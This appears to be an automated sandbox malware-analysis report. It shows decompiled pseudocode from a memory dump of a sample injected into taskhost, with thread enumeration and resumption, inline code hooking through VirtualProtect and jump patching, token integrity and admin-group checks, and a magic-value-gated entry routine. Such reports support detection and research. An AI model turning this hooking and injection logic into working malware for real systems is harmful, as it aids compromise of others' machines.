Source File: 00000013.00000002.757799892.015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: true

Associated: 00000013.00000002.757853407.01602000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_15d0000_taskhost.jbxd

Similarity

API ID: Free$InitializeLocal$AllocateDescriptorSecurity$AllocDaclEntries
String ID:
API String ID: 3430154970-0
Opcode ID: cb42f876d1f9ca61e42d698a5ee5fe83e0b2ad68973e7e2650e64fc420c2bb1b
Instruction ID: 5f3bf6f30aad06e62bb8d7353e915772865bc7e10a1887531993e0b8d3494a56
Opcode Fuzzy Hash: cb42f876d1f9ca61e42d698a5ee5fe83e0b2ad68973e7e2650e64fc420c2bb1b
Instruction Fuzzy Hash: DB616870D40348EBEB28CFE4C85CBAEBBF6BF42308F044419E512AE285D3B95949CB51

Uniqueness

Uniqueness Score: 1.69%

Function 015D9D74, Relevance: 12.1, APIs: 8, Instructions: 68
threadmemoryprocessUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E015D9D74(long* __esi) {
				void* _v8;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v36;
				void* _t22;
				int _t23;
				signed int _t27;
				void* _t30;
				int _t31;
				void* _t32;
				void* _t34;
				long _t37;
				long* _t40;

				_t40 = __esi;
				_t22 = CreateToolhelp32Snapshot(4, 0); // executed
				_v8 = _t22;
				if(_t22 != 0xffffffff) {
					_t34 = 0x1c;
					_v36 = _t34;
					_t23 = Thread32First(_t22,  &_v36); // executed
					while(_t23 != 0) {
						if(_v36 < 0x10 || _v24 != GetCurrentProcessId() || _v28 == GetCurrentThreadId()) {
							L12:
							_v36 = _t34;
							_t23 = Thread32Next(_v8,  &_v36); // executed
							continue;
						} else {
							_t37 =  *_t40;
							if(_t37 != 0) {
								_t27 = _t40[1];
								if(_t40[2] < _t27) {
									L11:
									 *((intOrPtr*)( *_t40 + _t40[2] * 4)) = _v28;
									_t40[2] = _t40[2] + 1;
									goto L12;
								}
								_t30 = HeapReAlloc( *0x15fe1b8, 0, _t37, _t27 << 3);
								if(_t30 == 0) {
									break;
								}
								_t40[1] = _t40[1] << 1;
								 *_t40 = _t30;
								goto L11;
							}
							_t40[1] = 0x80;
							_t32 = HeapAlloc( *0x15fe1b8, _t37, 0x200);
							 *_t40 = _t32;
							if(_t32 == 0) {
								break;
							}
							goto L11;
						}
					}
					_t31 = CloseHandle(_v8); // executed
					return _t31;
				}
				return _t22;
			}

0x015d9d74
0x015d9d7e
0x015d9d84
0x015d9d8a
0x015d9d93
0x015d9d99
0x015d9d9c
0x015d9e2a
0x015d9daa
0x015d9e1b
0x015d9e22
0x015d9e25
0x00000000
0x015d9dc2
0x015d9dc2
0x015d9dc6
0x015d9de9
0x015d9def
0x015d9e0d
0x015d9e15
0x015d9e18
0x00000000
0x015d9e18
0x015d9dfe
0x015d9e06
0x00000000
0x00000000
0x015d9e08
0x015d9e0b
0x00000000
0x015d9e0b
0x015d9dce
0x015d9ddb
0x015d9de1
0x015d9de5
0x00000000
0x00000000
0x00000000
0x015d9de7
0x015d9daa
0x015d9e35
0x00000000
0x015d9e3b
0x015d9e3d

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 015D9D7E
Thread32First.KERNEL32(00000000,?), ref: 015D9D9C
GetCurrentProcessId.KERNEL32(00000000), ref: 015D9DAC
GetCurrentThreadId.KERNEL32 ref: 015D9DB7
HeapAlloc.KERNEL32(?,00000200), ref: 015D9DDB
Thread32Next.KERNEL32(?,00000010), ref: 015D9E25
CloseHandle.KERNELBASE(?), ref: 015D9E35

Memory Dump Source

Source File: 00000013.00000002.757799892.015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: true

Associated: 00000013.00000002.757853407.01602000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_15d0000_taskhost.jbxd

Similarity

API ID: CurrentThread32$AllocCloseCreateFirstHandleHeapNextProcessSnapshotThreadToolhelp32
String ID:
API String ID: 1603055512-0
Opcode ID: dbd22f4e3b21a859b7560b82a99a191956ee0ac8bcbb474c7b824a7eb06a48ee
Instruction ID: 69c9e891b3c2bf6a29c94d790d0a31ea4029ab26215cc21191b5e1962b44bc40
Opcode Fuzzy Hash: dbd22f4e3b21a859b7560b82a99a191956ee0ac8bcbb474c7b824a7eb06a48ee
Instruction Fuzzy Hash: D6218070900306DFEB349FA8D849AAEBBF4FB04345F14052DE566EE194E730D545DB54

Uniqueness

Uniqueness Score: 100.00%

Function 015DBBE2, Relevance: 9.1, APIs: 6, Instructions: 65
sleepthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 54%

			E015DBBE2(void* __eflags) {
				char _v8;
				char _v20;
				char _v60;
				void* _t14;
				void* _t17;
				void* _t19;
				void* _t25;

				_v8 = 0;
				_v8 = E015E6B90( *0x15ffe7c);
				E015E99A0( &_v60, _t8,  *0x15ffc6c);
				E015E5CB0( &_v8, 0xffffffff);
				_t14 = E015E9810(_t25,  &_v20); // executed
				_push( &_v60);
				_push(0);
				_push(0);
				if(_t14 >= 0) {
					_push( &_v20);
				} else {
					_push(0);
				}
				_t17 = CreateEventA();
				 *0x16000f0 = _t17;
				if(_t17 != 0) {
					if(GetLastError() != 0xb7) {
						L9:
						_t19 = CreateThread(0, 0, E015DBB76, 0, 0, 0x15fe214); // executed
						 *0x15fe208 = _t19;
						if(_t19 == 0) {
							L7:
							CloseHandle( *0x16000f0);
							goto L4;
						}
						return 1;
					}
					if(SetEvent( *0x16000f0) != 0) {
						Sleep(0x1388);
						goto L9;
					}
					goto L7;
				} else {
					L4:
					return 0;
				}
			}

0x015dbbf1
0x015dbbff
0x015dbc07
0x015dbc12
0x015dbc1b
0x015dbc28
0x015dbc29
0x015dbc2a
0x015dbc2b
0x015dbc33
0x015dbc2d
0x015dbc2d
0x015dbc2d
0x015dbc34
0x015dbc3a
0x015dbc41
0x015dbc52
0x015dbc7d
0x015dbc8b
0x015dbc91
0x015dbc98
0x015dbc64
0x015dbc6a
0x00000000
0x015dbc6a
0x00000000
0x015dbc9c
0x015dbc62
0x015dbc77
0x00000000
0x015dbc77
0x00000000
0x015dbc43
0x015dbc43
0x00000000
0x015dbc43

APIs

Part of subcall function 015E6B90: lstrlenW.KERNEL32(015DBBF9,015DBBF9,?), ref: 015E6B9A

Part of subcall function 015E99A0: lstrlenA.KERNEL32(?), ref: 015E99D7
Part of subcall function 015E99A0: CharUpperBuffA.USER32(?,00000000), ref: 015E99E5

Part of subcall function 015E5CB0: lstrlenA.KERNEL32(?,?,015DDC95,01600148,00000000,00000000,015DDD24,?,?,?,?,015DCD87,?,?,015DBE69), ref: 015E5CC7
Part of subcall function 015E5CB0: HeapFree.KERNEL32(028D0000,00000000,00000000), ref: 015E5D0A

CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 015DBC34
GetLastError.KERNEL32 ref: 015DBC47
SetEvent.KERNEL32 ref: 015DBC5A
CloseHandle.KERNEL32 ref: 015DBC6A
Sleep.KERNEL32(00001388), ref: 015DBC77
CreateThread.KERNELBASE(00000000,00000000,015DBB76,00000000,00000000,015FE214), ref: 015DBC8B

Memory Dump Source

Source File: 00000013.00000002.757799892.015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: true

Associated: 00000013.00000002.757853407.01602000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_15d0000_taskhost.jbxd

Similarity

API ID: lstrlen$CreateEvent$BuffCharCloseErrorFreeHandleHeapLastSleepThreadUpper
String ID:
API String ID: 2440949999-0
Opcode ID: 62d6f630cce1d000a8e86056856844ae4b592f34db5d107264dcda101c088c6a
Instruction ID: c8c6b2b95d243c394438a01f12ba792b321f7fa1f1346049c49475d7f29b2dd5
Opcode Fuzzy Hash: 62d6f630cce1d000a8e86056856844ae4b592f34db5d107264dcda101c088c6a
Instruction Fuzzy Hash: EE118175C41216EBCB36ABB9DC08E9F7EBDFB06650B420515F516DD125FA308204D7A1

Uniqueness

Uniqueness Score: 5.54%

Function 015D9EE8, Relevance: 7.6, APIs: 5, Instructions: 79
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 71%

			E015D9EE8(signed int __eax, void* __ecx, signed int _a4) {
				long _v8;
				long _v12;
				int _t27;
				void* _t28;
				long _t45;
				void* _t54;
				void** _t59;

				_t59 = __eax * 0x28 +  *0x1602cc0;
				_t54 =  *_t59;
				_t45 = 5;
				_v8 = _t45;
				if((_t59[5] & 0x00000001) != 0) {
					_t54 = _t54 - _t45;
					_v8 = 7;
				}
				_t27 = VirtualProtect(_t54, _v8, 0x40,  &_v12); // executed
				if(_t27 != 0) {
					if(_a4 == 0) {
						_t17 =  &(_t59[3]); // -23080116
						_t28 = _t17;
						if((_t59[5] & 0x00000001) == 0) {
							_push(_t45);
						} else {
							_push(7);
						}
						memcpy(_t54, _t28, ??);
					} else {
						 *_t54 = 0xe9;
						 *((intOrPtr*)(_t54 + 1)) = _t59[1] - _t54 - _t45;
						if((_t59[5] & 0x00000001) != 0) {
							 *( *_t59) = 0xf9eb;
						}
					}
					VirtualProtect(_t54, _v8, _v12,  &_v12); // executed
					FlushInstructionCache(GetCurrentProcess(), _t54, _v8);
					_t59[5] = (_a4 & 1 | (_a4 & 0x00000001) + (_a4 & 0x00000001)) + (_a4 & 1 | (_a4 & 0x00000001) + (_a4 & 0x00000001)) | _t59[5] & 0xfffffff9;
				} else {
					_push(0xa);
					_pop(0);
				}
				return 0;
			}

0x015d9ef4
0x015d9eff
0x015d9f03
0x015d9f04
0x015d9f07
0x015d9f09
0x015d9f0b
0x015d9f0b
0x015d9f1c
0x015d9f24
0x015d9f2f
0x015d9f51
0x015d9f51
0x015d9f54
0x015d9f5a
0x015d9f56
0x015d9f56
0x015d9f56
0x015d9f5d
0x015d9f31
0x015d9f31
0x015d9f3b
0x015d9f42
0x015d9f46
0x015d9f46
0x015d9f42
0x015d9f70
0x015d9f81
0x015d9fa0
0x015d9f26
0x015d9f26
0x015d9f28
0x015d9f28
0x015d9fa9

APIs

VirtualProtect.KERNELBASE(?,?,00000040,00000001,?,00000000,00000000,?,?,?,015DA302,00000000,00000000,00000001), ref: 015D9F1C
memcpy.MSVCRT ref: 015D9F5D
VirtualProtect.KERNELBASE(?,?,00000001,00000001,00000001), ref: 015D9F70
GetCurrentProcess.KERNEL32(?,?,?,?,00000001,00000001,00000001), ref: 015D9F7A
FlushInstructionCache.KERNEL32(00000000,?,?), ref: 015D9F81

Memory Dump Source

Source File: 00000013.00000002.757799892.015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: true

Associated: 00000013.00000002.757853407.01602000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_15d0000_taskhost.jbxd

Similarity

API ID: ProtectVirtual$CacheCurrentFlushInstructionProcessmemcpy
String ID:
API String ID: 937878451-0
Opcode ID: e032bad7054feff5eec60b6e00d794220495c1649abbd66eb530b233158847a3
Instruction ID: d2c0815665625b7884929e50f9b3726c9c1a8676db563ea6d748bbc92e677495
Opcode Fuzzy Hash: e032bad7054feff5eec60b6e00d794220495c1649abbd66eb530b233158847a3
Instruction Fuzzy Hash: F921D372900206FFDB36CFACDC45BAE7BF8AF05708F040659EA16DA180D375AA04D761

Uniqueness

Uniqueness Score: 1.13%

Function 015E94C0, Relevance: 6.1, APIs: 4, Instructions: 93
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E015E94C0(void* _a4) {
				char _v8;
				char _v9;
				void* _v16;
				void** _v20;
				intOrPtr* _v24;
				char* _v28;
				void** _t31;

				_v9 = 0;
				_v20 = 0;
				if(OpenProcessToken(_a4, 8,  &_v16) != 0) {
					_t31 = E015E91C0(_v16, 0x19,  &_v8); // executed
					_v20 = _t31;
					if(_v20 != 0) {
						_v28 = GetSidSubAuthorityCount( *_v20);
						if(_v28 == 0 || ( *_v28 & 0x000000ff) == 0) {
							while(0 != 0) {
							}
						} else {
							_v24 = GetSidSubAuthority( *_v20, ( *_v28 & 0x000000ff) - 1);
							if(_v24 != 0) {
								if( *_v24 >= 0x2000) {
									if( *_v24 < 0x2000 ||  *_v24 >= 0x3000) {
										if( *_v24 >= 0x3000) {
											_v9 = 3;
										}
									} else {
										_v9 = 2;
									}
								} else {
									_v9 = 1;
								}
								L24:
								if(_v20 != 0) {
									E015E5CB0( &_v20, 0);
								}
								CloseHandle(_v16); // executed
								return _v9;
							}
							while(0 != 0) {
							}
						}
						goto L24;
					}
					while(0 != 0) {
					}
					goto L24;
				}
				L1:
				if(0 == 0) {
					return 0;
				} else {
				}
				goto L1;
			}

0x015e94c6
0x015e94ca
0x015e94e3
0x015e94fc
0x015e9504
0x015e950b
0x015e9524
0x015e952b
0x015e9537
0x015e953b
0x015e953f
0x015e9555
0x015e955c
0x015e956f
0x015e9580
0x015e959c
0x015e959e
0x015e959e
0x015e958d
0x015e958d
0x015e958d
0x015e9571
0x015e9571
0x015e9571
0x015e95a2
0x015e95a6
0x015e95ae
0x015e95b3
0x015e95ba
0x00000000
0x015e95c0
0x015e955e
0x015e9562
0x015e9564
0x00000000
0x015e952b
0x015e950d
0x015e9511
0x00000000
0x015e9513
0x015e94e5
0x015e94e7
0x00000000
0x00000000
0x015e94e9
0x00000000

APIs

OpenProcessToken.ADVAPI32(015EA2F9,00000008,?), ref: 015E94DB
GetSidSubAuthorityCount.ADVAPI32 ref: 015E951E
GetSidSubAuthority.ADVAPI32(00000000,-00000001), ref: 015E954F
CloseHandle.KERNELBASE(?), ref: 015E95BA

Memory Dump Source

Source File: 00000013.00000002.757799892.015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: true

Associated: 00000013.00000002.757853407.01602000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_15d0000_taskhost.jbxd

Similarity

API ID: Authority$CloseCountHandleOpenProcessToken
String ID:
API String ID: 1786183074-0
Opcode ID: 45de2439f09421ea709cbd1e90c28ee08a1ae7f5ddfc6740dae6b4e50d4462e4
Instruction ID: 7b5887c09748533110d6791af95fca08f2a40776a0300093f82a401c6115821e
Opcode Fuzzy Hash: 45de2439f09421ea709cbd1e90c28ee08a1ae7f5ddfc6740dae6b4e50d4462e4
Instruction Fuzzy Hash: 60318170D04209DFEB1DCBA4D84DBBEBBF6BF41208F04485AD9126E181D7B58644CBA2

Uniqueness

Uniqueness Score: 0.42%

Function 015E9330, Relevance: 6.1, APIs: 4, Instructions: 89
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E015E9330(void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				char _v20;
				char _v23;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				struct _SID_IDENTIFIER_AUTHORITY _v28;
				signed int _v32;
				long _v36;
				long _t37;

				_v36 = 0;
				_v8 = 0;
				_v28.Value = 0;
				_v27 = 0;
				_v26 = 0;
				_v25 = 0;
				_v24 = 0;
				_v23 = 5;
				_v12 = E015E9150(__ecx, 8);
				if(_v12 != 0) {
					_t37 = E015E91C0(_v12, 2,  &_v20); // executed
					_v8 = _t37;
					if(_v8 != 0) {
						if(AllocateAndInitializeSid( &_v28, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v16) != 0) {
							_v36 = 0;
							_v32 = 0;
							while(_v32 <  *_v8) {
								if(EqualSid( *(_v8 + 4 + _v32 * 8), _v16) == 0) {
									_v32 = _v32 + 1;
									continue;
								}
								_v36 = 1;
								break;
							}
							FreeSid(_v16);
							L15:
							CloseHandle(_v12); // executed
							if(_v8 != 0) {
								E015E5CB0( &_v8, 0);
							}
							return _v36;
						}
						while(0 != 0) {
						}
						goto L15;
					}
					goto L15;
				}
				return 0;
			}

0x015e9336
0x015e933d
0x015e9344
0x015e9348
0x015e934c
0x015e9350
0x015e9354
0x015e9358
0x015e9366
0x015e936d
0x015e9380
0x015e9388
0x015e938f
0x015e93bb
0x015e93c5
0x015e93cc
0x015e93de
0x015e93ff
0x015e93db
0x00000000
0x015e93db
0x015e9401
0x00000000
0x015e9401
0x015e9410
0x015e9416
0x015e941a
0x015e9424
0x015e942c
0x015e9431
0x00000000
0x015e9434
0x015e93bd
0x015e93c1
0x00000000
0x015e93c3
0x00000000
0x015e9391
0x00000000

APIs

Part of subcall function 015E9150: GetCurrentThread.KERNEL32(015E9363,00000000,00000008,?,?,015E9363,00000008), ref: 015E915E
Part of subcall function 015E9150: OpenThreadToken.ADVAPI32(00000000,?,?,015E9363,00000008), ref: 015E9165
Part of subcall function 015E9150: GetLastError.KERNEL32(?,?,015E9363,00000008), ref: 015E916F
Part of subcall function 015E9150: GetCurrentProcess.KERNEL32(015E9363,00000008,?,?,015E9363,00000008), ref: 015E9184
Part of subcall function 015E9150: OpenProcessToken.ADVAPI32(00000000,?,?,015E9363,00000008), ref: 015E918B

CloseHandle.KERNELBASE(00000000), ref: 015E941A

Memory Dump Source

Source File: 00000013.00000002.757799892.015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: true

Associated: 00000013.00000002.757853407.01602000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_15d0000_taskhost.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken$CloseErrorHandleLast
String ID:
API String ID: 664640673-0
Opcode ID: 39ba1d6e1830e5afdde6c8facc2314410918a644baae92c2a25f1e2a0cc4bd21
Instruction ID: cff2df45466fef247501dad43482200b965c6d30bb7e6e80354def28847006d2
Opcode Fuzzy Hash: 39ba1d6e1830e5afdde6c8facc2314410918a644baae92c2a25f1e2a0cc4bd21
Instruction Fuzzy Hash: 0F314D74D04209EBEF18CBE4C85DBAEBBF4BF48308F108458D5016B2C1D3799A45CB91

Uniqueness

Uniqueness Score: 0.03%

Function 015D9E9F, Relevance: 6.0, APIs: 4, Instructions: 29
threadmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E015D9E9F(void** __esi) {
				void* _t5;
				void* _t12;
				signed int _t14;
				void** _t15;

				_t15 = __esi;
				_t14 = 0;
				if( *__esi != 0) {
					if(__esi[2] <= 0) {
						L7:
						return HeapFree( *0x15fe1b8, 0,  *_t15);
					}
					do {
						_t12 = OpenThread(0x5a, 0,  *( *_t15 + _t14 * 4));
						if(_t12 != 0) {
							ResumeThread(_t12); // executed
							CloseHandle(_t12); // executed
						}
						_t14 = _t14 + 1;
					} while (_t14 < _t15[2]);
					goto L7;
				}
				return _t5;
			}

0x015d9e9f
0x015d9ea0
0x015d9ea4
0x015d9ea9
0x015d9ed6
0x00000000
0x015d9ee0
0x015d9eac
0x015d9ebb
0x015d9ebf
0x015d9ec2
0x015d9ec9
0x015d9ec9
0x015d9ecf
0x015d9ed0
0x00000000
0x015d9ed5
0x015d9ee7

APIs

OpenThread.KERNEL32(0000005A,00000000,00000000,00000000,?,015DA30F,?,00000000), ref: 015D9EB5
ResumeThread.KERNELBASE(00000000,?,015DA30F,?,00000000), ref: 015D9EC2
CloseHandle.KERNELBASE(00000000), ref: 015D9EC9
HeapFree.KERNEL32(00000000,00000001), ref: 015D9EE0

Memory Dump Source

Source File: 00000013.00000002.757799892.015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: true

Associated: 00000013.00000002.757853407.01602000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_15d0000_taskhost.jbxd

Similarity

API ID: Thread$CloseFreeHandleHeapOpenResume
String ID:
API String ID: 993137029-0
Opcode ID: f08a8bced0fef8d5317ef08b635adf5f8d62583204e01d51a1d77bb5af5ae847
Instruction ID: 3f141964fa22705497a07b4fb7b7bc56c59ce44bdb6b7e8dd48cb911316f507a
Opcode Fuzzy Hash: f08a8bced0fef8d5317ef08b635adf5f8d62583204e01d51a1d77bb5af5ae847
Instruction Fuzzy Hash: 67F01C31A00601EFDB325FA9EC84B1A7FF5FBC4745F150429B6A58D168D6319486AB11

Uniqueness

Uniqueness Score: 0.58%

Function 015DBD41, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108
threadUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			_entry_(void* __ebx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				void* __esi;
				intOrPtr _t20;
				intOrPtr _t22;
				intOrPtr _t24;
				char _t27;
				intOrPtr _t29;
				intOrPtr _t44;
				void* _t52;
				void* _t55;
				void* _t57;
				intOrPtr* _t63;

				_t60 = _a4;
				 *0x16000f4 = _a4;
				if(_a8 != 1) {
					__eflags = _a8;
					if(__eflags == 0) {
						E015D2A69(__ebx, __eflags);
						E015DCD71(_t52, 0);
						E015D8DF0();
						E015E8220(_t52, 1);
						E015D26EB();
						E015E7960();
						E015D7B41();
						 *_t63 = 0x15fe200;
						_push(0x15fe20c);
						E015E6FA0();
						__eflags =  *0x15fcb54; // 0x1
						if(__eflags != 0) {
							TerminateThread( *0x15fe208, 0);
						}
					}
					L17:
					__eflags = 1;
					return 1;
				}
				_t59 = _a12;
				if( *((intOrPtr*)(_a12 + 0x2fb)) == 0xe291a0f3) {
					E015E5C60(); // executed
					_t20 = E015E64B0(__eflags, 1); // executed
					_pop(_t55);
					__eflags = _t20;
					if(_t20 < 0) {
						goto L2;
					}
					_t22 = E015E9EA0(_t60, _t59, 5); // executed
					__eflags = _t22;
					if(__eflags == 0) {
						goto L2;
					}
					__eflags = E015DBCFA(__eflags);
					if(__eflags != 0) {
						goto L2;
					}
					_t24 = E015DBBE2(__eflags); // executed
					__eflags = _t24;
					if(_t24 == 0) {
						goto L2;
					} else {
						E015E82B0(E015E7CB0());
						_t27 = E015E6780(_t55, 0x15f);
						_a8 = _t27;
						__eflags = _t27;
						if(__eflags != 0) {
							 *0x15fe20c = E015E6E00(_t27, 0x3b, 0, 0x15fe200);
							E015E6890( &_a8);
						}
						E015D2A16(__eflags);
						_t29 = E015DBCA0( *0x15ffe7c);
						_pop(_t57);
						__eflags = _t29;
						if(_t29 == 0) {
							E015D8DCE();
							E015D82E7();
							E015DF03C();
							E015D26C3(E015DC470());
							E015DF124();
							E015D7B0D(_t57);
							E015D5E33(E015DC1D2(_t57));
							E015D2BA1();
							E015D2B83();
							E015D2B92();
							E015D2E44(0, __eflags);
							E015D2DD0();
							_t44 = E015DBEB5();
							__eflags = _t44;
							if(_t44 != 0) {
								E015D2BB0();
							}
						} else {
							E015D2BA1();
						}
						_push(0);
						E015D2A61();
						goto L17;
					}
				}
				L2:
				return 0;
			}

0x015dbd49
0x015dbd4d
0x015dbd53
0x015dbe5a
0x015dbe5d
0x015dbe5f
0x015dbe64
0x015dbe69
0x015dbe70
0x015dbe75
0x015dbe7a
0x015dbe7f
0x015dbe84
0x015dbe8b
0x015dbe90
0x015dbe97
0x015dbe9d
0x015dbea6
0x015dbea6
0x015dbe9d
0x015dbeac
0x015dbeae
0x00000000
0x015dbeae
0x015dbd59
0x015dbd66
0x015dbd6f
0x015dbd76
0x015dbd7b
0x015dbd7c
0x015dbd7e
0x00000000
0x00000000
0x015dbd84
0x015dbd8c
0x015dbd8e
0x00000000
0x00000000
0x015dbd95
0x015dbd97
0x00000000
0x00000000
0x015dbd99
0x015dbd9e
0x015dbda0
0x00000000
0x015dbda2
0x015dbda7
0x015dbdb1
0x015dbdb9
0x015dbdbc
0x015dbdbe
0x015dbdce
0x015dbdd7
0x015dbddc
0x015dbddf
0x015dbdea
0x015dbdef
0x015dbdf0
0x015dbdf2
0x015dbdfb
0x015dbe00
0x015dbe05
0x015dbe0f
0x015dbe14
0x015dbe19
0x015dbe23
0x015dbe28
0x015dbe2d
0x015dbe32
0x015dbe37
0x015dbe3c
0x015dbe41
0x015dbe46
0x015dbe48
0x015dbe4a
0x015dbe4a
0x015dbdf4
0x015dbdf4
0x015dbdf4
0x015dbe4f
0x015dbe50
0x00000000
0x015dbe55
0x015dbda0
0x015dbd68
0x00000000

APIs

__vprintf_l.LIBCMTD ref: 015DBD84
TerminateThread.KERNEL32(00000000), ref: 015DBEA6

Strings

cccc, xrefs: 015DBE97

Memory Dump Source

Source File: 00000013.00000002.757799892.015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: true

Associated: 00000013.00000002.757853407.01602000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_15d0000_taskhost.jbxd

Similarity

API ID: TerminateThread__vprintf_l
String ID: cccc
API String ID: 3670579848-3626891790
Opcode ID: c893ec15c9e43283e51fbcca98afeffac54368b5ca5fea7006dbb906b80b2fb1
Instruction ID: 91df825ca6d689e29ba98a27591701289b640f9e5a5ac0c6c1d77a0aa69a9a17
Opcode Fuzzy Hash: c893ec15c9e43283e51fbcca98afeffac54368b5ca5fea7006dbb906b80b2fb1
Instruction Fuzzy Hash: FC31F175D406175EE7367BFD9C09A5E369ABFF6A51F02442AEB25DE090EE70800087B3

Uniqueness

Uniqueness Score: 100.00%

Function 015E91C0, Relevance: 4.6, APIs: 3, Instructions: 64
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 46%

			E015E91C0(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, DWORD* _a12) {
				void* _v8;
				long _v12;
				int _t17;
				int _t24;

				_v8 = 0;
				_t29 = _a8;
				_t17 = GetTokenInformation(_a4, _a8, 0, 0,  &_v12); // executed
				if(_t17 != 0 || GetLastError() != 0x7a) {
					while(0 != 0) {
					}
					goto L13;
				} else {
					_v8 = E015E5C80(_t29, _v12);
					if(_v8 != 0) {
						_t24 = GetTokenInformation(_a4, _a8, _v8, _v12, _a12); // executed
						if(_t24 != 0) {
							L13:
							return _v8;
						}
						while(0 != 0) {
						}
						if(_v8 != 0) {
							E015E5CB0( &_v8, 0);
						}
						return 0;
					}
					while(0 != 0) {
					}
					return 0;
				}
			}

0x015e91c6
0x015e91d5
0x015e91dd
0x015e91e5
0x015e9239
0x015e923d
0x00000000
0x015e91f2
0x015e91fe
0x015e9205
0x015e9225
0x015e922d
0x015e923f
0x00000000
0x015e923f
0x015e922f
0x015e9233
0x015e9248
0x015e9250
0x015e9255
0x00000000
0x015e9258
0x015e9207
0x015e920b
0x00000000
0x015e920d

APIs

GetTokenInformation.KERNELBASE(00000001,00000001(TokenIntegrityLevel),00000000,00000000,00000001,00000001), ref: 015E91DD
GetLastError.KERNEL32 ref: 015E91E7

Part of subcall function 015E5C80: HeapAlloc.KERNEL32(028D0000,00000008,015F4B50,?,?,015E5D30,015E64F5,?,?,015E64F6,015F4B50,00000839), ref: 015E5C91

GetTokenInformation.KERNELBASE(?,?,00000000,?,?), ref: 015E9225

Memory Dump Source

Source File: 00000013.00000002.757799892.015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: true

Associated: 00000013.00000002.757853407.01602000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_15d0000_taskhost.jbxd

Similarity

API ID: InformationToken$AllocErrorHeapLast
String ID:
API String ID: 4258577378-0
Opcode ID: 4c9412840b3f1464773adca8fa925c28ccf1c2332d609316a71f98381bde0ca1
Instruction ID: 96677209e9340d73037465f582eaeaf55b5249b2140a65fea78f1bca8429315a
Opcode Fuzzy Hash: 4c9412840b3f1464773adca8fa925c28ccf1c2332d609316a71f98381bde0ca1
Instruction Fuzzy Hash: A0118F79E00209FBDF2CDEE8E84DBEE77F9BB48208F104855E60ADF140E6309A459752

Uniqueness

Uniqueness Score: 0.15%

Function 015E9290, Relevance: 4.6, APIs: 3, Instructions: 52
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E015E9290(void* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				char _v20;
				char _t19;

				_v16 = 0;
				_v20 = 0;
				_v12 = 0;
				_v8 = 0;
				if(OpenProcessToken(_a4, 8,  &_v16) != 0) {
					_t19 = E015E9260(_v16); // executed
					_v20 = _t19;
					if(_v20 != 0) {
						CloseHandle(_v16); // executed
						return _v20;
					}
					while(0 != 0) {
					}
					if(_v20 != 0) {
						E015E5CB0( &_v20, 0);
					}
					if(_v16 != 0) {
						CloseHandle(_v16);
					}
					return 0;
				}
				while(0 != 0) {
				}
				return 0;
			}

0x015e9296
0x015e929d
0x015e92a4
0x015e92ab
0x015e92c4
0x015e92d4
0x015e92dc
0x015e92e3
0x015e92f1
0x00000000
0x015e92f7
0x015e92e5
0x015e92e9
0x015e9300
0x015e9308
0x015e930d
0x015e9314
0x015e931a
0x015e931a
0x00000000
0x015e9320
0x015e92c6
0x015e92ca
0x00000000

APIs

OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 015E92BC
CloseHandle.KERNELBASE(00000000), ref: 015E92F1
CloseHandle.KERNEL32(00000000), ref: 015E931A

Memory Dump Source

Source File: 00000013.00000002.757799892.015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: true

Associated: 00000013.00000002.757853407.01602000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_15d0000_taskhost.jbxd

Similarity

API ID: CloseHandle$OpenProcessToken
String ID:
API String ID: 2202715855-0
Opcode ID: 9e4906e4226bb05ffe812c9a4295a906a91bd814b392bf93b50403c02a754fab
Instruction ID: 99eda67a4d210c55f1c96c6b00e2b5eddffaf2cdf0061a406698d20f6ed65d44
